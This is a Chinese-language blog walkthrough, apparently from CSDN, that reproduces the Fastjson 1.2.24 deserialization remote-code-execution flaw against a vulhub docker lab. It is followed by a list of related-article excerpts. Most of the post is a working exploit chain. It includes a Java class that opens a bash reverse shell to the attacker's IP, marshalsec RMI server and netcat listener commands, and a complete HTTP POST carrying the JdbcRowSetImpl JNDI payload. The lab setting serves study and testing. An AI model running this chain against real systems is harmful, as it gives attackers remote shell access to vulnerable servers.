代码编织梦想

靶机:centos7(docker,vulhub):192.168.125.139

攻击机:本机win10(maven,marshalsec,java环境):192.168.0.104

在靶机中启动fastjson漏洞环境,进入路径,docker-compose up -d启动漏洞环境:

ifconfig查下ip,docker-compose ps查下端口:ip:192.168.125.139;端口:8090。ip+端口在火狐浏览器访问:

在本机创建一个文件夹,打开文件夹,新建一个TouchFile.txt文件,写入恶意代码,将后缀改为java。

import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
   static {
       try {
   		Runtime r = Runtime.getRuntime();
   		Process p = r.exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/192.168.0.104/1111 0>&1"});
   		p.waitFor();
       } catch (Exception e) {
           // do nothing
       }
   }
}

上传恶意文件到公网,在本机打开命令行,进入存放java文件的目录,javac TouchFile.java编译刚才的java文件,编译完成在当前目录下发现class文件已经存在:TouchFile.class。

在当前目录(exp目录)启动一个简易的http服务:python -m http.server 2222

 

访问192.168.0.104:2222检查是否已经上传,这里已存在:

 进入marshalsec目录,借助marshalsec工具搭建rmi服务器来制定加载远程类。先编译出jar包:mvn clean package -DskipTests

编译完成会出现一个target目录,在targets中有编译好的jar包。

进入target下,启动rmi服务:java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.0.104:8080/#TouchFile" 3333

本机开启监听3333端口(反弹shell):nc -l 3333 -v

 至此,攻击环境准备好了。接下开启靶机代理,(不要用127.0.0.1),访问靶场抓包:

 修改构造数据包的请求方式为POST,然后在请求头加上Content-Type:application/json,再在请求体加上恶意payload,发包到靶机:

POST / HTTP/1.1
Host: 192.168.125.139:8090
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type:application/json

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.0.104:3333/TouchFile",
        "autoCommit":true
    }
}

 看回显

 文件服务器显示:

 rmi服务器显示:

 

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43660551/article/details/126373818

Fastjson漏洞复现-爱代码爱编程

Fastjson漏洞复现 前言环境搭建安装java环境安装maven编译marshalsec启动靶场漏洞利用 前言 靶场使用的是docker + vulhub,由于kali自带是jdk版本为11,而本次环境需要使用jdk8版本,且版本不能低于8u121。在使用mvn clean package -DskipTests命令的时候,需要使用mav

Fastjson RCE漏洞复现和理解-爱代码爱编程

漏洞:fastjson 远程代码执行漏洞漏洞原因:fastjson在执行反序列化时加载数据被注入,注入的数据被解析执行导致任意命令执行,利用该漏洞需要一条利用链才能实现。漏洞历史:现在fastjson的github版本已经到1.2.73了,但是历史上高危漏洞频繁出现。 如:1.2.24 出的反序列漏洞,经过对类的黑名单限制和autotype的关闭、chec

技术分享 | Fastjson-RCE漏洞复现-爱代码爱编程

Fastjson提供autotype功能,允许用户在反序列化数据中通过 @type 指定反序列化的类型,其次Fastjson自定义的反序列化会调用指定类中的setter方法和部分getter方法。 当组件开启autotype并且反序列化不可信的数据时,攻击者构造的数据(恶意代码)会进入特定类的setter或getter方法中,可能会被恶意利用。 影响版本

fastjson漏洞复现-爱代码爱编程

fastjson漏洞复现 fastjson漏洞原理简介靶机环境搭建漏洞探测发送一个错的数据包正确的数据包发送漏洞利用docker 搭建靶机编译恶意类启动HTTP服务启动rmi服务发送数据利用fastjson漏洞反弹shell fastjson漏洞原理简介 若lookup函数中的参数攻击者可控,便可以指向攻击者的服务器,即可实现JNDI注

fastjson1.2.47RCE漏洞的复现-爱代码爱编程

Fastjson1.2.47RCE漏洞复现 前言 我在上一篇文章中提到了我在长安杯打比赛,有一道我怎么也看不懂的题目,也就是当时“soeasy”。当我我查阅资料以及看了其他师傅们的wp之后,我发现这是Fastjson的一个RCE漏洞。因为以前接触Java的时间比较短,还不够熟悉,所以就去搞了个环境复现这个Fastjson的RCE漏洞。也就有了这篇文章。

fastjson反序列化复现步骤-爱代码爱编程

环境搭建 靶机linux攻击机windows恶意代码存放和rmi/ldap的服务机linux 1.靶机环境搭建 需要搭建docker、docker-compose建议老版本(注意检验docker-compose的版本是否与本机的架构一致)、下载docker-compose到目录 /usr/local/bin/后  执行权限分配 sudo chm

vulhub漏洞复现十四_fastjson-爱代码爱编程

前言 Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。 漏洞环境 靶  场:192.168.4.10_ubuntu 攻击机:19

【渗透测试漏洞复现】fastjson1.2.24漏洞复现详细过程-爱代码爱编程

文章目录 前言漏洞环境搭建漏洞利用复现处理json时发生反序列化JNDI注入反弹shell总结 前言 Fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。具有执行效率高的特点,应用范围广泛。 fastjson在解析js

vulhub专栏:fastjson1.2.24漏洞复现(一)_云舒_yunshu的博客-爱代码爱编程

入职大厂必会 写在前面的话:请注意本篇博客最后面的附(注意java版本),本篇博客采用的是LDAP服务getshell,rmi同理。阅读本篇博客需了解fastjson,ldap,rmi。 启动靶场 在终端里进入事先进入准备好的vulhub靶场目录下, cd fastjson/1.2.24-rce/ sudo docker-compose up -d

vulhub复现之fastjson1.2.47漏洞复现_小杜不饿的博客-爱代码爱编程

目录 什么是json? fastjson有啥用? 什么是fastjson? json语法规则 为什么要引进AutoType? 漏洞原理 怎么确认存在漏洞的? 漏洞复现 反弹shell 前言: 干什么事情都要坚持到底一定一定可以成功哒!!!学习真是痛并快乐着! 在此鸣谢郭师傅对我的悉心教导!听我说谢谢你! 看到这个漏洞我想先得

fastjson历史漏洞复现_曲折上升的博客-爱代码爱编程

Fastjson简介 Fastjson 是阿里巴巴公司开源的一款 JSON 解析器,它可以解析 JSON 格式的字符串, 支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 Jav

网安学习-应急响应1_yay17的博客-爱代码爱编程

目录 应急响应过程 案例一:web攻击应急响应溯源-后门,日志 #案例二-WIN系统攻击应急响应溯源-后门,日志,流量 第一种方法(不准确): 第二种方法: 通过UserAssistView来监控进程的执行时间等 应急响应过程 目的:分析攻击时间、攻击操作、攻击结果、安全修复等并给出合理的解决方案。 保护阶段:直接断网,保护现场

fastjson jdbcrowsetimpl利用链学习-爱代码爱编程

Python微信订餐小程序课程视频 https://blog.csdn.net/m0_56069948/article/details/122285951 Python实战量化交易理财系统 https://blog.c

fastjson反序列化漏洞复现(实战案例)_fastjsonscan-爱代码爱编程

漏洞介绍 FastJson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。 通俗理解就是:漏洞利用fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类连接

metasploit——渗透攻击模块(exploit)_metasploit渗透攻击-爱代码爱编程

Metasploit常用命令、技术功能模块  Metasploit——辅助模块(Auxiliary)  目录 1.Exploit模块 2.生成Payload  3.Meterpreter常用命令 4.弱点扫描  1.Exploit模块 Active exploits主动:攻击者主动向目标发起漏洞利用代码,触发漏洞